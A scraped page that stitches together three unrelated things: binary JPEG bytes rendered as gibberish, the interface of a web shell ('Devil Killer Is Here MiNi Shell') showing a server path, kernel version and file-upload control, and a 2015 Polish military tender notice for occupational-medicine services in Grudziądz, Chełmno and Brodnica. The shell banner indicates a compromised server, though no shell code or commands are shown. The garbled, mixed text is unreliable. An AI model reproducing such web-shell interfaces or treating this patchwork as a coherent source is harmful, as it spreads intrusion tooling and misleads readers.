JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151109/301984-N-2015.html

<p class="kh_header"><b>Grudziądz: USŁUGI WYKONYWANIA BADAŃ LEKARSKICH W ZAKRESIE MEDYCYNY PRACY DLA ŻOŁNIERZY I PRACOWNIKÓW JEDNOSTEK WOJSKOWYCH W MIEJSCOWOŚCIACH GRUDZIĄDZ, CHEŁMNO, BRODNICA - SPRAWA NR 126/2015</b><br>
<b>Numer ogłoszenia: 301984 - 2015; data zamieszczenia: 09.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 13 Wojskowy Oddział Gospodarczy , ul. Czwartaków 3, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 261 48 32 90, 261 48 32 00, faks 261 48 32 22.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.13wog.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa sektora finansów publicznych - wojsko.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI WYKONYWANIA BADAŃ LEKARSKICH W ZAKRESIE MEDYCYNY PRACY DLA ŻOŁNIERZY I PRACOWNIKÓW JEDNOSTEK WOJSKOWYCH W MIEJSCOWOŚCIACH GRUDZIĄDZ, CHEŁMNO, BRODNICA - SPRAWA NR 126/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie usługi badań lekarskich oraz konsultacji specjalistycznych w zakresie medycyny pracy, dla żołnierzy i pracowników jednostek wojskowych w miejscowościach: Grudziądz, Chełmno, Brodnica zgodnie z wymaganiami określonymi poniżej przez Zamwiającego oraz szczegółowym wykazem usług ujętym w Formularzu ofertowym oraz warunkami świadczenia przedmiotu zamówienia wyszczególnionymi w Ogólnych Warunkach Umowy:
1) Zadanie nr 1:  Wykonywanie usługi badań lekarskich oraz konsultacji specjalistycznych w zakresie medycyny pracy dla żołnierzy i pracowników instytucji: Jednostka Wojskowa 4503, ul. Czwartaków 3, 86-300 Grudziądz; Jednostka Wojskowa 1109, ul. Hallera 62, 86-300 Grudziądz; Centrum Szkolenia Logistyki, ul. Bema 2, 86-300 Grudziądz, Grupa, Węzeł Łączności, ul. Bema 1, 86-300 Grudziądz; Wojskowa Komenda Uzupełnień (WKU), ul. Legionów 48, 86-300 Grudziądz; Skład 1 Regionalnej Bazy Logistycznej  ul. Czwartaków 3, 86-300 Grudziądz; Skład 1 Regionalnej Bazy Logistycznej  Gardeja, 86-318 Rogóźno; 1 Rejonowe Warsztaty Techniczne ul. Czwartaków 3, 86-300 Grudziądz; Skład nr 1 i 2 Jednostki Wojskowej 1523  ul. Legionów 54 , 86-300 Grudziądz; Żandarmeria Wojskowa w Bydgoszczy Oddział w Grudziądzu, ul. Bema 11, 86-300 Grudziądz 2) Zadanie nr 2: Wykonywanie usługi badań lekarskich oraz konsultacji specjalistycznych w zakresie medycyny pracy wraz z dokonywaniem okresowych przeglądów stanowiskowych miejsc pracy (w przypadku zaistniałej konieczności): Jednostka Wojskowa 3136, ul. Aleje 3 Maja 4, 86-200 Chełmno;  Węzeł Łączności, ul. Aleje 3 Maja 4, 86-200 Chełmno; Grupa Zabezpieczenia Chełmno, ul. Aleje 3 Maja 4, 86-200 Chełmno 3) Zadanie nr 3: Wykonywanie usługi badań lekarskich oraz konsultacji specjalistycznych w zakresie medycyny pracy dla żołnierzy i pracowników instytucji:	Jednostka Wojskowa 3537, ul. Czwartaków 1, 87-300 Brodnica; Wojskowa Komenda Uzupełnień (WKU), ul. Królowej Jadwigi 4, 87-300 Brodnica; Węzeł Łączności, ul. Czwartaków 1 , 87-300 Brodnica; Grupa Zabezpieczenia Brodnica, ul. Czwartaków 1, 87-300 Brodnica.
2. Świadczone usługi winny obejmować co najmniej zakres wskazany w Formularzu ofertowym oraz Ogólnych Warunkach Umowy z uwzględnieniem obowiązku wykonywania usługi w pełnym zakresie badań medycyny pracy.
3. Wykonawca w zakresie zadania nr 1 zobowiązuje się do prowadzenia grup dyspanseryzacyjnych żołnierzy zawodowych, na zasadach określonych w Rozporządzeniu Ministra Obrony Narodowej z dnia 23 grudnia 2010 r. w sprawie niektórych świadczeń zdrowotnych przysługujących żołnierzom zawodowym. 4. Wykonawca zobowiązuje się do wykonywania badań przez wykwalifikowany personel posiadający wszelkie niezbędne uprawnienia i dysponujący wysokiej jakości sprzętem medycznym. 5. Do podstawowych obowiązków Wykonawcy należeć będzie świadczenie usług z najwyższą starannością, aktualną wiedzą medyczną, dostępnymi metodami i środkami zapobiegania, rozpoznawania i leczenia chorób oraz zasadami etyki zawodowej, respektując prawa pacjenta zgodnie z następującymi aktami prawnymi: 1) przepisami ustawy z dnia 15.04.2011 r. o działalności leczniczej (Dz.U. Nr 112, poz. 654 
z póź. zm.);
2)	przepisami Ustawy z dnia 05.12.1996 r. o zawodach lekarza i lekarza dentysty 
(Dz. U. z 2008 r. nr 136 poz. 857 z późn. zm.)
3)	przepisami Ustawy z dnia 15.07.2011 r. o zawodach pielęgniarki i położnej (Dz. U. z 2014 r. 
poz. 1435).
6.	Świadczenia zdrowotne muszą być wykonywane przez personel lekarski, pielęgniarki i inny posiadający odpowiednie kwalifikacje i uprawnienia określone rozporządzeniem ministra Zdrowia i Opieki społecznej z dnia 30 maja 1996 r. w sprawie prowadzenia badan lekarskich pracowników zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. 1996 r. nr 69, poz. 332 z późn. zm.).
7.	Wykonawca winien spełniać wymogi zawarte w:
1)	ustawie z dnia 27.06.1997 r. o służbie medycyny pracy (Dz. U. z 2014 r., poz. 1184 z póź. zm.);
2)	rozporządzeniu Ministra Zdrowia i Opieki społecznej z dnia 30.05.1996 r. w sprawie przeprowadzenia badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. z 1996 r. Nr 69, poz. 332 z późn.zm.);
3)	rozporządzeniu Ministra Spraw Wewnętrznych z dnia 05.01.2012 r. w sprawie zadań służby medycyny pracy (Dz. U. z dnia 16.01.2012 r.);
4)	rozporządzeniu Ministra Obrony Narodowej z dnia 07.05.2010 r. w sprawie zadań służby medycyny pracy w jednostkach organizacyjnych podległych lub nadzorowanych przez Ministra Obrony Narodowej  (Dz. U. Nr 88, poz. 577);  
5)	rozporządzeniu Ministra Zdrowia z dnia 17.07.2014 r. w sprawie badań lekarskich kierowców 
i osób ubiegających się o uprawnienia kierowania pojazdami (Dz. U. z 2014 r., poz. 949);
6)	rozporządzeniu Ministra Obrony Narodowej z dnia 09.08.2010 r. w sprawie służby medycyny pracy w jednostkach organizacyjnych podległych Ministrowi Obrony Narodowej 
(Dz. U. z 2010 r. Nr 187, poz. 1257).  
7)	rozporządzeniu Ministra Obrony Narodowej z dnia 23.12.2010 r. w sprawie niektórych świadczeń zdrowotnych przysługujących żołnierzom zawodowym (Dz. U. z dnia 11.01.2011 r.  
Nr 8 poz. 36.) - w zakresie zadania nr 1. 
8.	Wykonawca winien dysponować odpowiednim zapleczem w celu zapewnienia całego pakietu usług medycznych objętych przedmiotem zamówienia.
9.	Gabinety w których będą wykonywane usługi medyczne powinny spełniać co najmniej standardy określone w rozporządzeniu Ministra Zdrowia z dnia 26 czerwca 2012 r. w sprawie szczegółowych wymagań jakim powinny odpowiadać pomieszczenia i urządzenia podmiotu wykonującego działalność leczniczą (Dz. U. z 2012 r. poz. 739), a sprzęt medyczny posiadać atesty i dopuszczenia określone przez Ministra Zdrowia.
10.	Ogólne wymagania realizacji usług:
1)	Wykonawca zapewni, by placówka medyczna była czynna codziennie (od poniedziałku do piątku) w dni robocze, w godzinach od 8.00 do 16.00;
2)	Wszystkie badania oraz konsultacje, objęte zakresem zamówienia, muszą być wykonywane kompleksowo w miejscowości, w której znajdują się jednostki wojskowe (oprócz m. Grupa, m. Gardeja) i instytucje. Dopuszcza się wyjątek, tj. wykonywanie usług specjalistycznych (np.: badań EEG oraz badań gastrologicznych) w miejscowości innej niż znajduje się dana jednostka (np. w Toruniu, Bydgoszczy), jednak w odległości do 100 km od siedziby jednostki kierującej na badanie;
3)	Zamawiający wymaga, aby dostępność lekarza medycyny pracy była nie rzadsza niż 1 dzień w tygodniu lub zgodnie z oświadczeniem Wykonawcę w treści oferty.
4)	Zamawiający wymaga, aby badania  z zakresu medycyny pracy wraz z badaniami laboratoryjnymi były wykonywane nie później niż 3 dni od daty rejestracji osoby uprawnionej do przeprowadzenia badań. Wyjątek stanowią konsultacje i badania specjalistyczne, które mogą być wykonywane w terminie do 14 dni od wydania skierowania na badania przez lekarza medycyny pracy.
5)	Zamawiający wymaga, aby lekarz okulista wydawał orzeczenia o potrzebie używania okularów korygujących do pracy z monitorem.
6)	Z usług w zakresie przeprowadzenia szczepień ochronnych i profilaktycznych (wraz z przeprowadzeniem badania kwalifikującego do szczepienia), okresowych przeglądów stanowisk miejsc pracy oraz kierowania na badania i konsultacje specjalistyczne wraz z wydaniem orzeczenia o nie zdolności/zdolności do pracy, Zamawiający nie musi korzystać w przypadku posiadania etatowego lekarza wojskowego.
7)	 Z usług w zakresie przeglądów stanowiskowych Zamawiający będzie korzystał tylko w przypadku zaistniałej konieczności.
11.	Szczegółowy opis warunków realizacji przedmiotu zamówienia określają Ogólne Warunki Umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.12.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców składających ofertę wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. PZP oraz gdy Wykonawca wykaże, iż posiada aktualną decyzję o wpisie we  właściwym  rejestrze  prowadzonym na podstawie art. 100 w zw. z art. 106 ust. 1 pkt. 1 ustawy z dnia 15.04.2011 r. o działalności leczniczej - Dz. U. Nr 112, poz. 654  (wpis do  rejestru  podmiotów  wykonujących działalność leczniczą). Ocena spełnienia powyższego warunku nastąpi na podstawie treści przedstawionych oświadczeń i dokumentów jak powyżej, na zasadzie spełnia lub nie spełnia wymaganego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w
postępowaniu, o których mowa w art. 22 ust. 1 pkt. 2 PZP. Ocena spełnienia powyższego warunku
nastąpi na podstawie treści przedstawionego oświadczenia jak powyżej, na zasadzie spełnia lub nie
spełnia wymaganego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w
postępowaniu, o których mowa w art. 22 ust. 1 pkt. 3 PZP. oraz gdy Wykonawca wykaże iż, posiada lub dysponuje gabinetami gwarantującymi pełen zakres usług medycznych zgodnie z wymaganiami: gabinety w których będą wykonywane usługi medyczne spełniające standardy określone w rozporządzeniu Ministra Zdrowia z dnia 26 czerwca 2012 r. w sprawie szczegółowych wymagań, jakim powinny odpowiadać pomieszczenia i urządzenia podmiotu wykonującego działalność leczniczą (Dz. U. z 2012 r. poz. 739) oraz sprzęt medyczny posiadający atesty i dopuszczenia określone przez Ministra Zdrowia. Ponadto Wykonawca powinien przedstawić wykaz placówek, w których będzie wykonywany przedmiot zamówienia. Ocena spełnienia powyższego warunku
nastąpi na podstawie treści przedstawionych oświadczeń jak powyżej, na zasadzie spełnia lub nie
spełnia wymaganego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w
postępowaniu, o których mowa w art. 22 ust. 1 pkt 3 PZP oraz gdy Wykonawca wykaże, że dysponuje personelem lekarskim (lekarze, pielęgniarki i inny) posiadającym odpowiednie kwalifikacje i uprawnienia określone rozporządzeniem ministra Zdrowia i Opieki społecznej z dnia 30 maja 1996 r. w sprawie prowadzenia badan lekarskich pracowników zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. 1996 r. nr 69, poz. 332 z późn. zm.). Ocena spełnienia powyższego warunku nastąpi na podstawie treści przedstawionych oświadczeń jak powyżej, na zasadzie spełnia lub nie spełnia wymaganego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w
postępowaniu, o których mowa w art. 22 ust. 1 pkt. 4 PZP oraz gdy Wykonawca wykaże, iż jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnie z przedmiotem zamówienia (wszystkie rodzaje ryzyka związane z przedmiotem zamówienia) ogółem na kwotę nie mniejszą niż 70.000,00 zł. Ocena spełnienia powyższego warunku nastąpi na podstawie treści przedstawionego oświadczenia jak powyżej, na zasadzie spełnia lub nie spełnia wymaganego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia (art. 26 ust. 2b Ustawy) - w formie kopii dokumentów tych podmiotów poświadczonych za zgodność z oryginałem przez Wykonawcę lub te podmioty. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy (art. 25 ust. 2e ustawy Pzp). Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy - art. 36a ustawy PZP. W przypadku gdy Wykonawca zamierza powierzyć wykonanie części zamówienia podwykonawcy winien w ofercie wskazać części zamówienia, których wykonanie zamierza powierzyć podwykonawcom lub / i Zamawiający żąda podania
przez Wykonawcę nazw (firm) podwykonawców, w sytuacji gdy Wykonawca powołuje się na zasoby tych
podwykonawców na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1. W przypadku, gdy Wykonawca nie wskaże w ofercie części zamówienia, której wykonanie powierzy podwykonawcom Zamawiający uzna, że całość zamówienia Wykonawca
wykona samodzielnie. Wykonawca wraz z ofertą winien przedłożyć:Formularz ofertowy; Oświadczenie o spełnieniu warunków udziału; Oświadczenie o braku podstaw wykluczenia w postępowaniu; Oświadczenie o dysponowaniu personelem oraz gabinetami; Oświadczenie o przynależności do grupy kapitałowej; Wykaz placówek, w których wykonywany będzie przedmiot zamówienia; Wykaz części zamówienia, które Wykonawca powierza do realizacji podwykonawcy; Informacja o Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Dostępność lekarza medycyny pracy - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 Ustawy przewiduje możliwość wprowadzenia zmian do treści zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, w następującym zakresie:
1)udziału podwykonawcy na etapie realizacji umowy w sytuacji, gdy Wykonawca nie przewidział jego udziału w treści oferty lub zmiany podwykonawcy na innego - w przypadku, kiedy Wykonawca określi go co do tożsamości w ofercie a nowy podwykonawca spełni wymagania dla fachowego wykonania powierzanych mu czynności lub części zamówienia zgodnie z umową (np. oświadczenie Wykonawcy, podwykonawcy);
2)	zmiany zakresu podwykonawstwa;
3)	zmiany podwykonawcy na innego lub rezygnacji z podwykonawcy uczestniczącego 
w realizacji umowy w sytuacji gdy Wykonawca na etapie składania ofert wykazał podwykonawcę jako podmiot, na którego zasoby wykonawca powołał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełnienia warunków udziału 
w postępowaniu, o których mowa w art. 22 ust. 1. Wykonawca w tej sytuacji będzie zobowiązany udowodnić  Zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia warunki w stopniu nie mniejszym niż wymagane w trakcie postępowania o udzielenie zamówienia. W przypadku konieczności wykonania badania z zakresu medycyny pracy nie wyszczególnionego w Opisie przedmiotu zamówienia, Strony uzgodnią cenę jednostkową danego badania lub konsultacji i załączą do niniejszej umowy aneks w przedmiotowym zakresie. Zmiana jak powyżej  wymaga zachowania formy pisemnej (aneks) oraz pisemnego wniosku jednej ze Stron o zmianę wraz z uzasadnieniem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.13wog.pl<br>
